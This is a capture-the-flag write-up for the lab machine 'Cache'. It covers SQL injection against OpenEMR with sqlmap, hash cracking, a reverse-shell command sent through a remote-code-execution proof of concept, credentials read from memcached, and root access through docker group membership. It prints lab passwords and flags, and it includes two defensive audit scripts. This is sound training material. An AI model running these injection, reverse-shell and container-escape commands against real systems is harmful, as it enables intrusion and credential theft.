Recon

Nmap Scan

The initial Nmap scan shows two open ports, 80 and 22. I started with port 80.

# Nmap 7.80 scan initiated Sun Aug  9 12:47:22 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.188
Nmap scan report for 10.10.10.188
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
| 256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_ 256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 9 12:49:26 2020 -- 1 IP address (1 host up) scanned in 123.77 seconds

Web Enumeration

The scrolling banner on the site reveals the hostname Cache.htb. The author.html page names the author (ASH) and another of his projects, HMS.

...
Check out his other projects like Cache:
HMS(Hospital Management System)
...

I added the domain to the hosts file and guessed there might be an HMS-related virtual host: hms.cache.htb gave nothing, but hms.htb worked.

The login page's source includes http://cache.htb/jquery/functionality.js. Fetching that file reveals the password H@v3_fun stored in plaintext in the JavaScript. The login form does not actually need it, though: any input logs you in and redirects to an under-construction page.


User.txt

OpenEMR

Fingerprinting the web application dates this OpenEMR version to around 2018. Searching for known vulnerabilities, [this link] describes a SQL injection. I saved the request locally (post.req), fed it to sqlmap, and recovered the CMS's username and password hash.

┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $cat post.req
GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: OpenEMR=3bk4f9a7j4h6p94chhnhtf3r5i; PHPSESSID=h3fakmmdtr24vnp31k2deuvi3v
Upgrade-Insecure-Requests: 1

The dumped username and password hash:

┌─[✗]─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $sqlmap -r post.req -D openemr -T users_secure --dump
...
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt | username | password | last_update | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1 | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL | NULL | NULL | NULL |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

Cracking the hash with hashcat gives $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.:xxxxxx (the $05$ prefix is a bcrypt cost factor of 5, low enough that offline cracking finishes quickly). The PDF referenced above also documents a remote code execution vulnerability that requires authentication; with the recovered credentials, [this PoC] yields a shell.

┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $python poc.py http://hms.htb -u openemr_admin -p xxxxxx -c 'bash -i >& /dev/tcp/10.10.16.8/1337 0>&1'
.---. ,---. ,---. .-. .-.,---. ,---.
/ .-. ) | .-.\ | .-' | \| || .-' |\ /|| .-.\
| | |(_)| |-' )| `-. | | || `-. |(\ / || `-'/
| | | | | |--' | .-' | |\ || .-' (_)\/ || (
\ `-' / | | | `--.| | |)|| `--.| \ / || |\ \
)---' /( /( __.'/( (_)/( __.'| |\/| ||_| \)\
(_) (__) (__) (__) (__) '-' '-' (__)

={ P R O J E C T I N S E C U R I T Y }=

Twitter : @Insecurity
Site : insecurity.sh

[$] Authenticating with openemr_admin:xxxxxx
[$] Injecting payload

┌─[matt@parrot]─[~/Documents/HTB/Boxes/Cache]
└──╼ $nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.188.
Ncat: Connection from 10.10.10.188:35164.
bash: cannot set terminal process group (2020): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cache:/var/www/hms.htb/public_html/interface/main$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

With a shell, the password found earlier in the JavaScript source lets us switch to user ash.

www-data@cache:/home$ su - ash
Password:
ash@cache:~$ cd
ash@cache:~$ cat user.txt
d3a9cb94055ba6e0087aec05b250b271

Root.txt

Memcache

Checking local listening ports, the target has 11211 open; looking up the process on that port confirms it is memcached.

ash@cache:/dev/shm$ netstat -anutp | grep 127.0.0.1
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:11211 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:55136 127.0.0.1:11211 TIME_WAIT -
tcp 0 0 127.0.0.1:55168 127.0.0.1:11211 TIME_WAIT -
udp 0 0 127.0.0.1:41070 127.0.0.53:53 ESTABLISHED -
ash@cache:/dev/shm$ ps -ef | grep 11211
memcache 943 1 0 Aug08 ? 00:00:24 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1 -P /var/run/memcached/memcached.pid
ash 20763 17528 0 07:32 pts/0 00:00:00 grep --color=auto 1121

Using the enumeration method described in [this article], I retrieved user luffy's password from the cache.

get user
VALUE user 0 5
luffy
END
get passwd
VALUE passwd 0 9
0n3_p1ec3
END
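The memcached text protocol carries no authentication, so anything the application puts in the cache is readable by any local user who can reach 127.0.0.1:11211. The following Python example is added here and is not part of the writeup: it parses the `VALUE ... END` reply format shown above (reading each data block by its declared byte length, so values containing CRLF are handled) and flags keys whose names look like credentials, the kind of inventory check a defender would run against what an application caches. The sample reply bytes, key names and the credential-name pattern are constructed for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the raw reply a memcached server returns to
# "get user passwd session" over the text protocol. Values are made up.
SAMPLE_RESPONSE = (
    b"VALUE user 0 5\r\n"
    b"alice\r\n"
    b"VALUE passwd 0 9\r\n"
    b"s3cr3t!!1\r\n"
    b"VALUE session 0 3\r\n"
    b"abc\r\n"
    b"END\r\n"
)

# Assumed heuristic for key names that suggest stored secrets; tune per app.
SENSITIVE_KEY = re.compile(r"(pass|pwd|secret|token|cred)", re.IGNORECASE)


def parse_get_response(raw: bytes) -> Dict[str, Tuple[int, bytes]]:
    """Parse a memcached text-protocol reply to one or more 'get' commands.

    Each item is 'VALUE <key> <flags> <bytes>[ <cas>]\r\n<data>\r\n' and the
    reply ends with 'END\r\n'. The data block is sliced by its declared
    length instead of splitting on CRLF, so binary or multi-line values
    survive. Malformed or truncated input raises ValueError.
    """
    items: Dict[str, Tuple[int, bytes]] = {}
    pos = 0
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol == -1:
            raise ValueError("truncated response: missing line terminator")
        line = raw[pos:eol]
        pos = eol + 2
        if line == b"END":
            return items
        parts = line.split()
        if len(parts) < 4 or parts[0] != b"VALUE":
            raise ValueError(f"unexpected line: {line!r}")
        key, flags, length = parts[1].decode(), int(parts[2]), int(parts[3])
        data = raw[pos:pos + length]
        if len(data) != length or raw[pos + length:pos + length + 2] != b"\r\n":
            raise ValueError(f"truncated data block for key {key}")
        items[key] = (flags, data)
        pos += length + 2


def is_well_formed(raw: bytes) -> bool:
    """True if the reply parses completely, False on any protocol error."""
    try:
        parse_get_response(raw)
        return True
    except ValueError:
        return False


def find_sensitive_keys(items: Dict[str, Tuple[int, bytes]]) -> List[str]:
    """Keys whose names suggest they hold credentials or secrets."""
    return sorted(k for k in items if SENSITIVE_KEY.search(k))


if __name__ == "__main__":
    parsed = parse_get_response(SAMPLE_RESPONSE)
    for key in find_sensitive_keys(parsed):
        print(f"[!] cache key {key!r} looks like a stored secret")
```

Run it as-is to see the flagged key from the constructed sample; to audit a real cache, feed it the bytes returned by the server after a `get` for the keys you are reviewing. The mitigation the check points at is the same either way: do not store credentials in an unauthenticated cache, and if memcached must run, keep it bound to localhost and restrict which local accounts exist on the host.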

After logging in over SSH, checking group membership shows luffy is in the docker group. GTFOBins explains that docker group membership can be used to break out of restrictions and escalate privileges ([article][GTFOBins]), and an ubuntu image is already present on the host. Following that method gives root and root.txt.

luffy@cache:~$ id
uid=1001(luffy) gid=1001(luffy) groups=1001(luffy),999(docker)
luffy@cache:~$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
ubuntu latest 2ca708c1c9cc 10 months ago 64.2MB
luffy@cache:~$ docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash
root@5cc8578e734e:/# id
uid=0(root) gid=0(root) groups=0(root)
root@5cc8578e734e:/mnt# cd /root/
root@5cc8578e734e:~# ls
root.txt
root@5cc8578e734e:~# cat root.txt
64e1b13ccadfeb5b0bdb9b22e7b81777
root@5cc8578e734e:~#
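Membership of the docker group is root-equivalent on any host where the daemon runs as root, because a member can bind-mount / into a container exactly as shown above. The Python below is an added example, not code from the writeup or from GTFOBins: it parses /etc/group text and reports members of groups an auditor treats as root-equivalent, so the finding can be raised before an attacker reaches it. The sample /etc/group contents and the group list are constructed assumptions; the list contains only docker because that is the group this box abuses.

```python
from typing import Dict, List, Tuple

# Constructed sample of /etc/group; user and group names are made up apart
# from mirroring the docker-group situation in the writeup.
SAMPLE_ETC_GROUP = """\
root:x:0:
sudo:x:27:ash
docker:x:999:luffy,deploy
memcache:x:113:
"""

# Groups whose membership is treated as root-equivalent. Assumption for the
# example; an auditor would extend this for the environment being reviewed.
ROOT_EQUIVALENT_GROUPS: Tuple[str, ...] = ("docker",)


def parse_etc_group(text: str) -> Dict[str, List[str]]:
    """Map group name -> supplementary members from /etc/group contents.

    Lines are 'name:password:gid:member1,member2'. Blank lines, comments
    and lines without exactly four fields are skipped rather than guessed at.
    """
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue
        name, _password, _gid, members = fields
        groups[name] = [m for m in members.split(",") if m]
    return groups


def root_equivalent_members(
    text: str, groups: Tuple[str, ...] = ROOT_EQUIVALENT_GROUPS
) -> Dict[str, List[str]]:
    """Return {group: members} for every watched group that has members."""
    parsed = parse_etc_group(text)
    return {g: parsed[g] for g in groups if parsed.get(g)}


if __name__ == "__main__":
    # Audit the local host; on the writeup's box this would list luffy.
    with open("/etc/group", encoding="utf-8") as fh:
        findings = root_equivalent_members(fh.read())
    for group, members in findings.items():
        print(f"[!] {group}: {', '.join(members)} (root-equivalent via daemon access)")
```

The fix for a finding is to remove the user from the group and, where users genuinely need to run containers, to use Docker's rootless mode or a dedicated build host, since no daemon-side option makes an interactive docker-group member safely non-root.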